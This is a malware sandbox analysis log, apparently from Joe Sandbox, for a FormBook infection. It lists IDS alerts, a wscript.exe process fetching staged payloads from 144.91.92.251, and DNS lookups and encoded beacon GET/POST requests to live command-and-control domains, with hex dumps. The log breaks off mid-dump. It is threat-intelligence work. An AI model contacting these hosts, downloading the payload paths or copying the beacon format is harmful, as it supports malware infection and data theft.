Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:58295 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:58300 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:58300 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:58267 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:58294 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:58264 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:58264 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:58303 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:58276 -> 144.76.229.203:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:58276 -> 144.76.229.203:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:58278 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:58305 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:58282 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:58296 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:58274 -> 144.76.229.203:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:58296 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:58273 -> 144.76.229.203:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:58280 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:58280 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:58298 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:58307 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:58256 -> 199.59.243.228:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:58256 -> 199.59.243.228:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:58257 -> 8.210.49.139:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:58279 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:58288 -> 92.204.40.98:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:58288 -> 92.204.40.98:80

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\wscript.exe

Network Connect: 144.91.92.251 80

Jump to behavior

Performs DNS queries to domains with low reputation

Source:	DNS query: www.sidang.xyz
Source:	DNS query: www.hastanhizmetleri.xyz
Source:	DNS query: www.noudge.xyz
Source:	DNS query: www.031235045.xyz
Source:	DNS query: www.vaishnavi.xyz
Source:	DNS query: www.dualbitcoin.xyz
Source:	DNS query: www.gelida.xyz
Source:	DNS query: www.minimalbtc.xyz

Source: global traffic	TCP traffic: 192.168.2.5:56814 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.5:58251 -> 162.159.36.2:53

Source: Joe Sandbox View	IP Address: 8.210.49.139 8.210.49.139
Source: Joe Sandbox View	IP Address: 144.76.229.203 144.76.229.203
Source: Joe Sandbox View	IP Address: 13.248.169.48 13.248.169.48

Source: Joe Sandbox View	ASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
Source: Joe Sandbox View	ASN Name: ACPCA ACPCA

Source: unknown	TCP traffic detected without corresponding DNS query: 144.91.92.251
Source: unknown	TCP traffic detected without corresponding DNS query: 144.91.92.251
Source: unknown	TCP traffic detected without corresponding DNS query: 144.91.92.251
Source: unknown	TCP traffic detected without corresponding DNS query: 144.91.92.251
Source: unknown	TCP traffic detected without corresponding DNS query: 144.91.92.251
Source: unknown	TCP traffic detected without corresponding DNS query: 144.91.92.251
Source: unknown	TCP traffic detected without corresponding DNS query: 144.91.92.251
Source: unknown	TCP traffic detected without corresponding DNS query: 144.91.92.251
Source: unknown	TCP traffic detected without corresponding DNS query: 144.91.92.251
Source: unknown	TCP traffic detected without corresponding DNS query: 144.91.92.251
Source: unknown	TCP traffic detected without corresponding DNS query: 144.91.92.251
Source: unknown	TCP traffic detected without corresponding DNS query: 144.91.92.251
Source: unknown	TCP traffic detected without corresponding DNS query: 144.91.92.251
Source: unknown	TCP traffic detected without corresponding DNS query: 144.91.92.251
Source: unknown	TCP traffic detected without corresponding DNS query: 144.91.92.251
Source: unknown	TCP traffic detected without corresponding DNS query: 144.91.92.251
Source: unknown	TCP traffic detected without corresponding DNS query: 144.91.92.251
Source: unknown	TCP traffic detected without corresponding DNS query: 144.91.92.251
Source: unknown	TCP traffic detected without corresponding DNS query: 144.91.92.251
Source: unknown	TCP traffic detected without corresponding DNS query: 144.91.92.251
Source: unknown	TCP traffic detected without corresponding DNS query: 144.91.92.251
Source: unknown	TCP traffic detected without corresponding DNS query: 144.91.92.251
Source: unknown	TCP traffic detected without corresponding DNS query: 144.91.92.251
Source: unknown	TCP traffic detected without corresponding DNS query: 144.91.92.251
Source: unknown	TCP traffic detected without corresponding DNS query: 144.91.92.251
Source: unknown	TCP traffic detected without corresponding DNS query: 144.91.92.251
Source: unknown	TCP traffic detected without corresponding DNS query: 144.91.92.251
Source: unknown	TCP traffic detected without corresponding DNS query: 144.91.92.251
Source: unknown	TCP traffic detected without corresponding DNS query: 144.91.92.251
Source: unknown	TCP traffic detected without corresponding DNS query: 144.91.92.251
Source: unknown	TCP traffic detected without corresponding DNS query: 144.91.92.251
Source: unknown	TCP traffic detected without corresponding DNS query: 144.91.92.251
Source: unknown	TCP traffic detected without corresponding DNS query: 144.91.92.251
Source: unknown	TCP traffic detected without corresponding DNS query: 144.91.92.251
Source: unknown	TCP traffic detected without corresponding DNS query: 144.91.92.251
Source: unknown	TCP traffic detected without corresponding DNS query: 144.91.92.251
Source: unknown	TCP traffic detected without corresponding DNS query: 144.91.92.251
Source: unknown	TCP traffic detected without corresponding DNS query: 144.91.92.251
Source: unknown	TCP traffic detected without corresponding DNS query: 144.91.92.251
Source: unknown	TCP traffic detected without corresponding DNS query: 144.91.92.251
Source: unknown	TCP traffic detected without corresponding DNS query: 144.91.92.251
Source: unknown	TCP traffic detected without corresponding DNS query: 144.91.92.251
Source: unknown	TCP traffic detected without corresponding DNS query: 144.91.92.251
Source: unknown	TCP traffic detected without corresponding DNS query: 144.91.92.251
Source: unknown	TCP traffic detected without corresponding DNS query: 144.91.92.251
Source: unknown	TCP traffic detected without corresponding DNS query: 144.91.92.251
Source: unknown	TCP traffic detected without corresponding DNS query: 144.91.92.251
Source: unknown	TCP traffic detected without corresponding DNS query: 144.91.92.251
Source: unknown	TCP traffic detected without corresponding DNS query: 144.91.92.251
Source: unknown	TCP traffic detected without corresponding DNS query: 144.91.92.251

Source: global traffic	HTTP traffic detected: GET /12032025/w5 HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 144.91.92.251
Source: global traffic	HTTP traffic detected: GET /12032025/extention HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 144.91.92.251
Source: global traffic	HTTP traffic detected: GET /12032025/s HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 144.91.92.251
Source: global traffic	HTTP traffic detected: GET /12032025/v HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 144.91.92.251
Source: global traffic	HTTP traffic detected: GET /12032025/r HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 144.91.92.251
Source: global traffic	HTTP traffic detected: GET /12032025/cn HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 144.91.92.251
Source: global traffic	HTTP traffic detected: GET /12032025/EwILnvEcBTbp6d6bUTk3.txt HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 144.91.92.251
Source: global traffic	HTTP traffic detected: GET /12032025/w1 HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 144.91.92.251
Source: global traffic	HTTP traffic detected: GET /12032025/w2 HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 144.91.92.251
Source: global traffic	HTTP traffic detected: GET /12032025/file HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 144.91.92.251
Source: global traffic	HTTP traffic detected: GET /12032025/w6 HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 144.91.92.251
Source: global traffic	HTTP traffic detected: GET /12032025/w7 HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 144.91.92.251
Source: global traffic	HTTP traffic detected: GET /12032025/w8 HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 144.91.92.251
Source: global traffic	HTTP traffic detected: GET /12032025/w9 HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 144.91.92.251
Source: global traffic	HTTP traffic detected: GET /12032025/instant HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 144.91.92.251
Source: global traffic	HTTP traffic detected: GET /cwaj/?oxIhy=NmUfxQrz0WFQu6ex3B+4pm0wutRNdkQrCagHYkSMqQArAACBkiI71BEuNA1edrIRm5QCdE2XawPBlU7vbp4PjNCdCvebA7Hhbv8bqup0BvYtU+JKCBY0uV8JLNgt890c4w==&jNOdd=-zN0k4oPvLat HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.isoemarket.shopConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 6_0_2 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A550 Safari/8536.25
Source: global traffic	HTTP traffic detected: GET /6wi0/?oxIhy=MUmOKOjVbEpAXFm9wjsh8/qMHN43MS2c6TEVXWaXYAj73tUw1MgyAUdmulGWvnB4v8QQA07PGVxg24rIHlu1siYsoOrObu10SOcN0QOH29uIuoPuJLabTdJZR63++uNGYQ==&jNOdd=-zN0k4oPvLat HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.vsilmhxj.tokyoConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 6_0_2 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A550 Safari/8536.25
Source: global traffic	HTTP traffic detected: GET /0j68/?jNOdd=-zN0k4oPvLat&oxIhy=T5zk9dsLIunu/n4sMlTl5TxbL17m3yvhtRkOTnRpQURxiR8cfQXlWi1cANaqvjchzXTdjhRSt4g8/GNhVjyhEhdlcYNRbPgnX71zfilunZM0UluFFg/5Ryc48lNsE+ctcg== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.sidang.xyzConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 6_0_2 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A550 Safari/8536.25
Source: global traffic	HTTP traffic detected: GET /yw3f/?oxIhy=EQSrhtPuDg3pW57/t668kTJUp7qGcAJHL6EaWebBO0TpTRxDo7/bTIB2xez8ddqkXF2LbmtEbkI7kZgVxT7fagIUNfln8U9TZGg8btQoXWVLJ1CQg05AxZF+Ia/EyFurdg==&jNOdd=-zN0k4oPvLat HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.hastanhizmetleri.xyzConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 6_0_2 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A550 Safari/8536.25
Source: global traffic	HTTP traffic detected: GET /n00b/?oxIhy=iQ+QS1lo6uvIGGPL/anhhZjVtxmDNRRo2wOeU9EorhnMg6Dg3MakUEzOvHEw8ZD+mNMFq81MdilwNKpwrucLpG8r5UB1SdY630Uw5A+vDtRvb5bjKOJh6vIds0IoCQnirg==&jNOdd=-zN0k4oPvLat HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.noudge.xyzConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 6_0_2 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A550 Safari/8536.25
Source: global traffic	HTTP traffic detected: GET /x35a/?oxIhy=dWY7lI8HDhihY6JPDiu2Y6hLOPsEmINoIrDJkGpZj0gBIjegzPnOseQLWLFbNyUuWYMzRp0ci/LZueoJN+9YyR0Lrod4geHY8cfBbV6P/fya+rAQRprM84Zbk84bYPx5NQ==&jNOdd=-zN0k4oPvLat HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.031235045.xyzConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 6_0_2 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A550 Safari/8536.25
Source: global traffic	HTTP traffic detected: GET /2p9f/?jNOdd=-zN0k4oPvLat&oxIhy=kR4sXqxEqdCKxcdw2vMtqb3AM0C84J13h13R7fH3Y7T7Jml87ikCWT0lH6J8YdG1qFj+UvZ1zE/9YSWRQ7SaUUre6LY7Hb7YPM+xXn3LZsD/pSHRtAGAGH55FVykf1PZCw== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.fkrvhaupjtc.infoConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 6_0_2 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A550 Safari/8536.25
Source: global traffic	HTTP traffic detected: GET /a255/?oxIhy=71qW4Nx4dt5SfVYZkQHtIjrMqfw8DY/cD1lK2mKt9LCJZ4STjm65LcjSJQ2HTSiE+Z7WdPOkz4Dc0w/KNAm2ryLk2JmyVAt8mn0uK6lqh8eMq4aBfHJEChhHrbw8D0Fmtw==&jNOdd=-zN0k4oPvLat HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.vintageprod.netConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 6_0_2 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A550 Safari/8536.25
Source: global traffic	HTTP traffic detected: GET /lfjm/?jNOdd=-zN0k4oPvLat&oxIhy=SYdBkJci5v39nf4UBCyxxB+PkIPUh5cSvGXaIroc+h3NqMcJAPR48Il0IqREyzliai9XD9lgyxpgfQFl8d4wy9Wkhc6mOSNqPsdv1fPT8EDpozyGwDGr0ERZiwmr3ZB1EQ== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.vaishnavi.xyzConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 6_0_2 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A550 Safari/8536.25
Source: global traffic	HTTP traffic detected: GET /6m32/?oxIhy=Va/we0xl003DQZZ95AFUEv2evIgZUlG+bUy9vd5w4QTsm7kbnVGOKZ/fShoalOeRjCVBwCWzFLQL56uWIkSa2tYKSJXyzAfbbf+mTDAnZgMONJFwgStppJO9Q+dLfX3Buw==&jNOdd=-zN0k4oPvLat HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.rbopisalive.cyouConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 6_0_2 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A550 Safari/8536.25
Source: global traffic	HTTP traffic detected: GET /o4w6/?jNOdd=-zN0k4oPvLat&oxIhy=6lKfvrTTzjNBleeoPlg/CC2pMX1objNQ3seX6l6NteG/OnLU2Wkj2ZjnFUXwTNDzYGydJHdrz8GXGpxHCC5uawCOTF6qZhvNi5eLtsWVxK5aDLiS1rSaeWalPlRXaZzfig== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.dualbitcoin.xyzConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 6_0_2 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A550 Safari/8536.25
Source: global traffic	HTTP traffic detected: GET /3xxf/?oxIhy=nI71gAHwA2y1h+HY+qsI8s92/p9MV/yUWZbbeDVE2zDMFU7E/I5Jnbhdlga2X4Rk93x69PX2UbpyE4MrGgdnJ40zzGGSbH0S4Y8y3Utt867ZYNj8q+nuJkQhUaDOnooOmw==&jNOdd=-zN0k4oPvLat HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.gelida.xyzConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 6_0_2 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A550 Safari/8536.25
Source: global traffic	HTTP traffic detected: GET /fhz4/?oxIhy=y3wcV3BcSnsNbAsnaJpbRzODaiq+VMDqBMCwqxxOuE6l68kPpv6Jklxr3hJ8vTcwN6tD2iIaYUe19tgZRNYhofAkkOa1SwFiaUCBT6FYnyfd4w1dqFRZvnPCEDDVJiTnqg==&jNOdd=-zN0k4oPvLat HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.spacewalker.appConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 6_0_2 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A550 Safari/8536.25
Source: global traffic	HTTP traffic detected: GET /x1ok/?oxIhy=59KYOEoUMDOvAyQ1rYTKQ5GOGBS37n+ZBotswWz2AJMcdqWyh/wiqqHIk/e5YCUGKcb3PS7ii7ge7s5ywJ4YQj+PEJkMfbBq8HI5POAyUQDDkrJ9ybbzkf15cRTgQ6etqA==&jNOdd=-zN0k4oPvLat HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.minimalbtc.xyzConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 6_0_2 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A550 Safari/8536.25

Source: global traffic	DNS traffic detected: DNS query: 18.31.95.13.in-addr.arpa
Source: global traffic	DNS traffic detected: DNS query: www.isoemarket.shop
Source: global traffic	DNS traffic detected: DNS query: www.vsilmhxj.tokyo
Source: global traffic	DNS traffic detected: DNS query: www.sidang.xyz
Source: global traffic	DNS traffic detected: DNS query: www.hastanhizmetleri.xyz
Source: global traffic	DNS traffic detected: DNS query: www.noudge.xyz
Source: global traffic	DNS traffic detected: DNS query: www.031235045.xyz
Source: global traffic	DNS traffic detected: DNS query: www.fkrvhaupjtc.info
Source: global traffic	DNS traffic detected: DNS query: www.vintageprod.net
Source: global traffic	DNS traffic detected: DNS query: www.vaishnavi.xyz
Source: global traffic	DNS traffic detected: DNS query: www.rbopisalive.cyou
Source: global traffic	DNS traffic detected: DNS query: www.dualbitcoin.xyz
Source: global traffic	DNS traffic detected: DNS query: www.gelida.xyz
Source: global traffic	DNS traffic detected: DNS query: www.spacewalker.app
Source: global traffic	DNS traffic detected: DNS query: www.minimalbtc.xyz
Source: global traffic	DNS traffic detected: DNS query: www.7gcapital.club

Source: unknown

HTTP traffic detected: POST /6wi0/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.vsilmhxj.tokyoOrigin: http://www.vsilmhxj.tokyoConnection: closeContent-Length: 206Content-Type: application/x-www-form-urlencodedCache-Control: max-age=0Referer: http://www.vsilmhxj.tokyo/6wi0/User-Agent: Mozilla/5.0 (iPad; CPU OS 6_0_2 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A550 Safari/8536.25Data Raw: 6f 78 49 68 79 3d 42 57 4f 75 4a 37 44 6b 55 57 46 43 57 30 76 2b 6a 51 63 50 6f 63 6a 78 49 75 34 62 41 43 47 30 72 51 51 6c 62 57 32 69 65 6a 50 77 37 4c 6f 43 33 37 6f 4c 44 30 70 6e 30 78 66 31 6a 6d 5a 6d 70 66 74 48 45 67 50 55 54 54 70 6a 32 4a 33 57 47 6c 79 31 76 6d 35 49 6e 64 50 53 55 35 55 41 56 4f 77 34 7a 57 54 30 34 38 75 51 6d 73 2f 6f 4f 5a 75 39 65 4e 4a 73 46 49 54 59 2f 63 41 35 48 77 43 67 36 39 7a 4e 73 57 58 76 6b 79 43 61 76 73 6d 45 67 4c 6b 47 46 77 64 74 76 74 79 38 77 2f 45 4c 6a 35 37 76 63 6f 64 6e 51 47 33 74 4e 71 41 57 7a 51 6e 70 50 66 45 6f 71 5a 31 6d 68 5a 6b 4b 37 52 77 3d Data Ascii: oxIhy=BWOuJ7DkUWFCW0v+jQcPocjxIu4bACG0rQQlbW2iejPw7LoC37oLD0pn0xf1jmZmpftHEgPUTTpj2J3WGly1vm5IndPSU5UAVOw4zWT048uQms/oOZu9eNJsFITY/cA5HwCg69zNsWXvkyCavsmEgLkGFwdtvty8w/ELj57vcodnQG3tNqAWzQnpPfEoqZ1mhZkK7Rw=

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Mar 2025 13:21:45 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 